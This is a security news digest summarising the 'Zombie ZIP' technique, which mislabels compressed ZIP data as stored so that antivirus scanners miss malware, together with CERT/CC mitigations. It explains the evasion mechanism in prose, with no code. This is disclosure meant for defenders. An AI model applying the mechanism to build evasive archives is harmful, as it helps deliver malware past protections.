CP
cyberpings
Malware & RansomwareHIGH

Zombie ZIPs: New Trick Outsmarts Antivirus Software

CSCSO Online
Zombie ZIPantivirusmalwareCVE-2026-0866CERT/CC
🎯

Basically, new 'Zombie ZIP' files can hide malware from antivirus programs.

Quick Summary

A new technique called Zombie ZIP is tricking antivirus software into missing malware. This affects nearly all users, putting your data at risk. Be cautious with ZIP files, especially from unknown sources, and delete suspicious ones immediately.

What Happened

A new cybersecurity threat has emerged, and it’s called Zombie ZIP. This technique allows attackers to hide malicious payload?s within compressed files, effectively tricking antivirus? solutions into believing these files are safe. Developed by Chris Aziz from Bombadil Systems, this method exploits how antivirus? programs interpret ZIP file header?s.

When standard extraction tools like WinRAR or 7-Zip process these specially crafted ZIP files, they encounter errors or corrupt data. This happens because the ZIP header?s are manipulated to mislead the software. Instead of flagging the file as potentially dangerous, security tools scan it as if it were a harmless copy of the original data. According to Aziz, 50 out of 51 antivirus programs, including Microsoft Defender, can be fooled by this method.

The trick lies in how antivirus? programs trust the “Method” field of ZIP files. If it shows “Method=0” (STORED), they treat the data as uncompressed raw data. However, the actual data is DEFLATE?-compressed, leading scanners to see only compressed noise and miss any malware? signatures. This allows attackers to create a loader that ignores the header?, treating the archive correctly and restoring the malicious payload? without detection.

Why Should You Care

This is a big deal for anyone who uses a computer or mobile device. Imagine downloading a file that you think is safe, only to find out it was hiding malware? all along. This could mean compromised personal data, financial loss, or even a full system takeover. Your antivirus software might not be enough to protect you!

Think of it like a magician’s trick. You see a box that looks empty, but there’s actually something hidden inside. Just like you wouldn’t trust an empty box, you shouldn’t blindly trust files, especially from unknown sources. If you encounter errors while extracting a ZIP file, it’s a red flag that you should not ignore.

What's Being Done

In response to this alarming discovery, the CERT Coordination Center (CERT/CC) has issued a warning about Zombie ZIP?s. They recommend that security tool providers take immediate action by:

  • Validating compression method fields against actual data.
  • Adding mechanisms to detect inconsistencies in archive structures.
  • Implementing stricter archive inspection modes.

As a user, you should be cautious with archive files, especially those from unfamiliar senders. If you see an error message like “unsupported method” when extracting, delete the file immediately. Experts are closely monitoring this situation for further developments, as the implications of Zombie ZIP?s could lead to a significant increase in successful malware? attacks.

💡 Tap dotted terms for explanations

🔒 Pro insight: The Zombie ZIP technique highlights a critical gap in trust models for file integrity checks in antivirus solutions.

Original article from

CSO Online

Read Full Article

Share

Related Pings

HIGHMalware & Ransomware

SmartApeSG Campaign Deploys Remcos RAT via ClickFix Page

A new campaign is using a fake ClickFix page to spread Remcos RAT. Individuals and organizations are at risk of remote access and data theft. Stay vigilant and protect your systems from this growing threat.

SANS ISC Full Text·
HIGHMalware & Ransomware

Ransomware Negotiator Allegedly Extorted Victims for Millions

A ransomware negotiator is accused of extorting victims for millions. DigitalMint claims ignorance of his actions. This scandal raises serious concerns about trust in cybersecurity professionals.

SC Media·
HIGHMalware & Ransomware

New VENON Malware Targets Brazilian Banking Users

A new malware called VENON is targeting Brazilian banking users. This Rust-based threat employs advanced techniques to steal sensitive information. Stay alert and protect your accounts from this evolving danger.

SC Media·
HIGHMalware & Ransomware

FBI Investigates Malware Spread Through Steam Games

The FBI is investigating malware hidden in Steam games. Gamers who installed these titles may have had their accounts compromised. If you played these games, report your experience to help the investigation.

BleepingComputer·
HIGHMalware & Ransomware

Credential Theft: Storm-2561 Spoofs VPN Clients to Steal Logins

A new cybercrime group is spoofing VPN clients to steal user credentials. Cisco and Fortinet users are particularly at risk. Stay alert and ensure you’re downloading software from official sources to protect your data.

The Register Security·
HIGHMalware & Ransomware

Ransomware Responder Allegedly Aided BlackCat Cybercriminals

A cybersecurity responder allegedly aided BlackCat hackers in negotiating higher ransoms. This shocking breach of trust has raised alarms in the industry. DigitalMint has since terminated the involved parties and is enhancing oversight.

The Record·